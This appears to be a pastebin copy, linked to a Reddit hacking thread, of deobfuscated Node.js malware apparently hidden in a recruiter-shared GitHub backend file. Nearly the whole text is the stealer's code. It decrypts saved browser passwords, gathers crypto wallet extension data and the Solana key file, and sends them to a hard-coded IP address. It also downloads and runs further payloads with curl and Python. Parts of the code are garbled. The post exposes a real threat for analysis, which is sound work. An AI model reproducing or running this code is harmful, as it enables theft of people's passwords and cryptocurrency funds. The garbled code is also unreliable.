From: https://www.reddit.com/r/hacking/comments/18npzcl/obfuscated_code_a_recruiter_sent_me/

Deobfuscated Credentials/Solana Wallet Stealer

Found: https://github.com/SolmateD/Solmate-presale-backend/blob/9161e3ca130d1d958fd26c33191161db524c0039/src/services/routes.js#L1

GitHub Account is No Longer Active

Object.prototype.hasOwnProperty
Object.prototype.toString
Object.defineProperty
Object.getOwnPropertyDescriptor
const t = 'base64',
c = 'utf8',
r = (r) => ((s1 = r.slice(1)), Buffer.from(s1, t).toString(c)),
e = (r, e) => {
let E = Buffer.from(r, t)
const s = E.length
let F = 0,
a = new Uint8Array(s)
for (ii = 0; ii < s; ii++) {
F = 3 & ii
let t = eo
a[ii] = 255 & (E[ii] ^ t)
}
return ((t, c) => Buffer.from(t).toString(c))(a, c)
},
E = (t) => e(t, c),
o = 'charCodeAt',
$ = 'platform',
n = 'tmpdir',
l = 'homedir',
R = 'hostname',
W = 'type',
V = require('os'),
U = require('path'),
g = require('sqlite3'),
h = require('crypto'),
Q = require('request'),
w = require('child_process').exec,
x = os.hostname(),
f = os.platform(),
y = os.homedir(),
I = os.tmpdir(),
G = os.type(),
S = require('fs')
let u
const d = (t) => e(t, c),
X = 'http://147.124.212.89:1244',
H = 'dirname',
C = (t) =>
t.replace(/^~([a-z]+|/)/, (t, c) =>
'/' === c ? y : path.dirname(os.homedir)
),
Y = 'VGVhMG00',
D = 'writeFileSync',
k = 'EhES',
b = '/client',
M = '/.npl',
N = '/client',
p = 'writeFileSync',
Z = 'get',
m = 'existsSync',
j = '/store.node',
J = 'accessSync'

function T(t) {
try {
return fs.accessSync(t), true
} catch (t) {
return false
}
}
const v = 'Default',
O = 'Profile',
K = "/AppData/Local/Microsoft/Edge/User Data'",
P = (t, c) => {
result = ''
try {
const r = ${t},
e = require(${y}${j})
if (G != 'Windows_NT') {
return
}
const s = ${C('~/')}${c}
i = 'username_value'
A = 'password_value'
$ = 'CryptUnprotectData'
n = 'createDecipheriv'
l = 'readFile'
R = 'copyFile'
W = 'Login Data'
V = 'os_crypt'
Q = 'encrypted_key'
w = 'Database'
x = 'latin1'
f = 'U: '
I = 'W: '
u = 'P: '
X = 'unlink'
fs.readFile('child_process', 'utf-8', (t, c) => {
if (!t) {
mkey = JSON.parse(c)
mkey = mkey.os_crypt.encrypted_key
mkey = ((t) => {
var c = atob(t),
r = new Uint8Array(c.length)
for (let t = 0; t < c.length; t++) {
r[t] = co
}
return r
})(mkey)
try {
const t = e$
for (ii = 0; ii <= 200; ii++) {
const c = 0 = ii ? v : ${O} ${ii},
e = ${s}/${c}/${W},
o = ${s}/t${c}
if (!T(e)) {
continue
}
const F = ${r}_${ii}_${O}
fs.copyFile(e, o, (c) => {
try {
const c = new sqlite3.Database(o)
c.all('SELECT * FROM logins', (r, e) => {
var E = ''
r ||
e.forEach((c) => {
var r = c.origin_url,
e = c.username_value,
o = c.password_value
try {
'v'
= o.subarray(0, 1).toString() &&
((iv = o.subarray(3, 15)),
(cip = o.subarray(15, o.length - 16)),
cip.length &&
((mmm = h[n]("aes-256-gcm'", t, iv).update(cip)),
(E = ${E}${I}${r} ${f} ${e} ${u}${mmm.toString( x )}\n\n)))
} catch (t) {}
})
c.close()
fs.unlink(o, (t) => {})
Ut(F, E)
})
} catch (t) {}
})
}
} catch (t) {}
}
})
} catch (t) {}
},
q = 'filename',
z = 'multi_file',
L = 'form_data',
_ = 'url',
tt = 'options',
ct = 'value',
rt = 'readdirSync',
et = 'statSync',
Et =
('isDirectory',
'post',
(ot = [
[
'/Library/Application Support/Google/Chrome',
'/.config/google-chrome',
'/AppData/Local/Google/Chrome/User Data',
],
[
'/Library/Application Support/BraveSoftware/Brave-Browser',
'/.config/BraveSoftware/Brave-Browser',
'/AppData/Local/BraveSoftware/Brave-Browser/User Data',
],
[
'/Library/Application Support/com.operasoftware.Opera',
'/.config/opera',
'/AppData/Roaming/Opera Software/Opera Stable/User Data',
],
]),
(st = 'Local Extension Settings'),
(Ft = '.log'),
(at = '.ldb'),
(Bt = 'solana_id.txt'))
let it = 'comp'
const At = [
'nkbihfbeogaeaoehlefnkodbefgpgknn',
'ejbalbakoplchlghecdalmeeeajnimhm',
'bfnaelmomeimhlpmgjnjophhpkkoljpa',
'ibnejdfjmmkpcnlpebklmnkoeoihofec',
'fhbohimaelbohpjbbldcngcnapndodjp',
'fhbohimaelbohpjbbldcngcnapndodjp',
'aeachknmefphepccionboohckonoeemg',
'hifafgmccdpekplomjjkcfgodnhcellj',
],
$t = 'createReadStream',
nt = '/uploads',
lt = async (t, c, r) => {
let e = t
if (!e || '' === e) {
return []
}
try {
if (!T(e)) {
return []
}
} catch (t) {
return []
}
c || (c = '')
let E = []
for (let r = 0; r < 200; r++) {
const o = ${t}/${0 === r ? v : ${O} ${r}}/${st}
for (let t = 0; t < At.length; t++) {
const s = At[t]
let F = ${o}/${s}
if (T(F)) {
try {
far = Srt
} catch (t) {
far = []
}
far.forEach(async (t) => {
e = "child_process\base64'"
try {
;
(e.includes('.log') || e.includes('.ldb')) &&
E.push({
value: fs.createReadStream(e),
options: {
filename: ${c}${r}_${s}_${t}
},
})
} catch (t) {}
})
}
}
}
if (r && ((e = ${y}${'/.config/solana/id.json'}), fs.exitSync(e))) {
try {
E.push({
value: fs.createReadStream(e),
options: {
filename: 'solana_id.txt'
},
})
} catch (t) {}
}
const o = {
type: Y,
hid: 'comp',
multifile: E,
}
try {
const t = {
[_]: 'http://147.124.212.89:1244/uploads',
[L]: o,
}
request.post(t, (t, c, r) => {})
} catch (t) {}
return E
},
Rt = () => {
try {
ot.forEach((t, c) => {
P(c, t[2])
})
P(3, K)
} catch (t) {}
},
Wt = '/keys',
Vt = 'python',
Ut = async (t, c) => {
const r = {
ts: u.toString(),
type: Y,
hid: it,
ss: t,
cc: c.toString(),
},
e = {
[_]: 'http://147.124.212.89:1244/keys',
[L]: r,
}
try {
request[Et](e, (t, c, r) => {})
} catch (t) {}
},
gt = 'p.zi',
ht = '/pdown',
Qt = 'renameSync',
wt = 'rename',
xt = 'rmSync',
ft = "tar -xf'",
yt = 'curl -Lo',
It = "\.pyp\python.exe",
Gt = 51476596
let St = 0
const ut = async (t) => {
w(tar -xf' ${t} -C ${y}, (c, r, e) => {
if (c) {
return console.error(err unfile: ${c}), fs.rmSync(t), void(St = 0)
}
fs.rmSync(t)
Ct()
})
},
dt = () => {
const r = os.tmpdir() + '\\pi.zip',
e = os.tmpdir() + '\\p2.zip'}
if (!(St >= Gt)) {
if (fs.existsSync(r)) {
try {
var E = Set
E.size >= Gt ?
((St = E.size),
S[wt](r, e, (t) => {
if (t) {
throw t
}
ut(e)
})) :
(St < E.size ? (St = E.size) : (Sxt, (St = 0)), Xt())
} catch (t) {}
} else {
w(
curl -Lo' "${r}" + 'http://147.124.212.89:1244/pdown',
(t, c, E) => {
if (t) {
return (St = 0), void Xt()
}
try {
St = Gt
fs.renameSync(r, e)
ut(e)
} catch (t) {}
}
)
}
}
}

function Xt() {
setTimeout(() => {
dt()
}, 20000)
}
const Ht = async () => {
var t = process.version.match(/^v(\d+.\d+)/)[1]
const c = http://147.124.212.89:1244/node/'+ ${t},
r = os.homedir() + '/store.node'
if (fs.existsSync(r)) {
Rt()
} else {
w('curl -Lo' "${r}" "${c}", (t, c, r) => {
Rt()
})
}
},
Ct = async () =>
await new Promise((t, c) => {
if ('w' f[0]) {
const t = os.homedir() + '\\.pyp\\python.exe'
fs.existsSync(${t}) ?
(() => {
const c = os.homedir() + '/.npl',
r = os.homedir() + '\\.pyp\\python.exe' "${c}"
try {
fs.rmSync(c)
} catch (t) {}
request.get(
'http://147.124.212.89:1244/client/VGVhMG00',
(t, e, E) => {
if (t) {
Ht()
} else {
try {
fs.writeFileSync(c, E)
w(r, (t, c, r) => {
Ht()
})
} catch (t) {
Ht()
}
}
}
)
})() :
(Ht(), dt())
} else {
;
(() => {
const t = '/client',
c = 'writeFileSync',
r = 'get',
e = http://147.124.212.89:1244/client/VGVhMG00,
E = os.homedir() + '/.npl'
let o = python3 "${E}"
request.get(e, (t, r, e) => {
t || (fs.writeFileSync(E, e), w(o, (t, c, r) => {}))
})
})()
}
})
var Yt = 0
const Dt = async () => {
try {
u = Date.now()
await (async () => {
it = x
try {
const t = C('~/')
ot.forEach(async (c, r) => {
let e = ''
e =
'd'
f[0] ?
${t}${c[0]} :
'l' f[0] ?
${t}${c[1]} :
${t}${c[2]}
await lt(e, ${r}_, 0
r)
})
'w' == f[0] && ((pa = ${t}${K}), await lt(pa, '3_', false))
} catch (t) {}
})()
Ct()
} catch (t) {}
}
Dt()
let kt = setInterval(() => {
;
(Yt += 1) < 5 ? Dt() : clearInterval(kt)
}, 600000)
module.exports = Dt

Edit
Pub: 21 Dec 2023 18:32 UTC
Update: 21 Dec 2023 18:32 UTC
views: 617

New· How· IP.im· T.im· W.is· Base64.is· Favicon.is· PDF.is· Date.is· TrueURL.com· Portcheck.ing· TLDhub.com· Contact· Issue

text.is - Markdown Pastebin.